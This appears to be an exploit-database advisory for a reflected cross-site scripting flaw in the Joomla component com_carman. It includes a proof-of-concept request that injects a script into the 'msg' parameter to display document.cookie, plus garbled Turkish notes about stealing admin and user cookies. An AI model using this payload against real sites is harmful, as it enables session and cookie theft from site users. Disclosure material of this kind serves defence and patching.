Joomla Component com_carman Cross Site Scripting Vulnerability

vendor:

com_carman

by:

Fl0riX

7.5

CVSS

HIGH

Cross Site Scripting

CWE

Product Name: com_carman

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_carman Cross Site Scripting Vulnerability

An attacker can exploit this vulnerability by injecting malicious JavaScript code into the 'msg' parameter of the 'index.php' page. This code will be executed in the browser of the victim when they visit the vulnerable page.

Mitigation:

Input validation should be used to prevent malicious characters from being injected.

Source

Exploit-DB raw data:

< ------------------- header data start ------------------- >

#####################################################################
       Joomla Component com_carman Cross Site Scripting Vulnerability                                          
####################################################################

# author        :Fl0riX
# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name        : com_carman

# Bug Type       : Cross Site Scripting

# Infection          : Y&#65533;netici ve User cookie&#65533;leri &#65533;al&#65533;nabilir.

# Bug Fix Advice     : Zararl&#65533; karakterler filtrelenmelidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

< -- bug code end of -- >